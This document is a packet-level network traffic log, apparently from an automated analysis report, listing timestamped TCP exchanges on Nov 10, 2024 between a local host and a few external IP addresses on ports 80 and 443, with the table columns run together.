                                                                                                                                                                                Nov 10, 2024 09:18:29.271136999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271147966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271157026 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.271179914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271184921 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.271190882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271204948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271217108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.271238089 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.271274090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.312911987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.312927008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.312949896 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.312995911 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.313051939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.325469017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325484037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325498104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325570107 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.325680971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325695038 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325706005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325757027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.325757027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.325942039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325954914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325965881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325979948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.325993061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:29.326004028 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.326042891 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:29.690654993 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:35.638210058 CET4990780192.168.2.978.47.21.153
                                                                                                                                                                                Nov 10, 2024 09:18:35.643065929 CET804990778.47.21.153192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:35.643295050 CET4990780192.168.2.978.47.21.153
                                                                                                                                                                                Nov 10, 2024 09:18:35.643449068 CET4990780192.168.2.978.47.21.153
                                                                                                                                                                                Nov 10, 2024 09:18:35.648190022 CET804990778.47.21.153192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:36.586478949 CET804990778.47.21.153192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:36.586493969 CET804990778.47.21.153192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:36.586579084 CET4990780192.168.2.978.47.21.153
                                                                                                                                                                                Nov 10, 2024 09:18:36.590313911 CET4990780192.168.2.978.47.21.153
                                                                                                                                                                                Nov 10, 2024 09:18:36.590313911 CET4990780192.168.2.978.47.21.153
                                                                                                                                                                                Nov 10, 2024 09:18:39.135637999 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.135674953 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.135745049 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.142707109 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.142719984 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.753910065 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.753994942 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.760206938 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.760220051 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.760529041 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.808270931 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.836925030 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.879347086 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965410948 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965466022 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965495110 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965514898 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.965528011 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965538979 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965562105 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.965620995 CET44349927172.67.19.24192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.965889931 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:39.983339071 CET49927443192.168.2.9172.67.19.24
                                                                                                                                                                                Nov 10, 2024 09:18:40.223246098 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:40.223860979 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:40.228182077 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:40.228251934 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:40.228645086 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:40.228704929 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:40.230947971 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:40.231121063 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:40.235766888 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:40.235884905 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070198059 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070215940 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070226908 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070238113 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070255995 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070267916 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070286036 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070297956 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070302010 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.070310116 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070327044 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070343018 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070355892 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070358038 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.070368052 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.070369959 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070383072 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070413113 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.070419073 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070435047 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070449114 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070450068 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.070461988 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070470095 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.070475101 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070487976 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.070494890 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.072573900 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.076370001 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.076433897 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.120759010 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.120759964 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.182243109 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182256937 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182276964 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182287931 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182298899 CET8049934147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182405949 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182416916 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182420969 CET4993480192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.182423115 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.182435989 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182447910 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182459116 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.182463884 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.182491064 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.183187008 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.183214903 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.183217049 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.183309078 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.187280893 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.187292099 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.187302113 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.188188076 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.299483061 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.299508095 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.299520016 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.299618959 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.299638987 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.299650908 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.299650908 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.300010920 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.300043106 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.300049067 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.300060034 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.300487995 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.300501108 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.300512075 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.300518990 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.300568104 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.300568104 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.304604053 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.304651022 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.304662943 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.304727077 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.304738998 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.304760933 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.304970980 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.416731119 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.416757107 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.416773081 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.416793108 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.416806936 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.416816950 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.417139053 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.417311907 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.417325974 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.417339087 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.417397022 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.417397022 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.417453051 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.417464972 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.417474985 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.420536041 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.421828032 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.421840906 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.421852112 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.421930075 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.421930075 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.464601994 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.464632034 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.464710951 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.534854889 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.534869909 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.534882069 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535031080 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535042048 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535057068 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535062075 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.535077095 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535080910 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.535695076 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535707951 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535722017 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.535727024 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.535777092 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.535777092 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.539752960 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.539767027 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.539779902 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.539792061 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.539860010 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.539860010 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.539899111 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.581842899 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.581865072 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.581876040 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.582012892 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.582012892 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.651603937 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.651628971 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.651690006 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.651899099 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.651948929 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.651956081 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.652009010 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.652023077 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.652035952 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.652116060 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.652523994 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.652544022 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.652561903 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.652621984 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.652621984 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.657025099 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.657037973 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.657048941 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.657159090 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.698904037 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.699631929 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.699657917 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.699672937 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.699697971 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.699724913 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.699899912 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.769227028 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769335032 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769485950 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.769815922 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769828081 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769849062 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769860983 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769875050 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.769884109 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.769912958 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.770222902 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.770236015 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.770247936 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.770273924 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.770338058 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.774487019 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.774507046 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.774519920 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.774626017 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.774692059 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.774738073 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.774765015 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.816658974 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.816669941 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.816747904 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.816751003 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.816761017 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.816787004 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.860511065 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.860554934 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.860559940 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.886286974 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.886301041 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.886378050 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.886899948 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.886910915 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.886944056 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.887007952 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887022018 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887037992 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887047052 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.887051105 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887074947 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.887660027 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887672901 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887684107 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.887701988 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.887733936 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.891521931 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.891577005 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.891594887 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.891622066 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.891628981 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.891664982 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.932853937 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.932866096 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.932914972 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.934294939 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.934312105 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.934326887 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:41.934348106 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:41.980128050 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.004002094 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.004029989 CET8049933147.45.47.81192.168.2.9
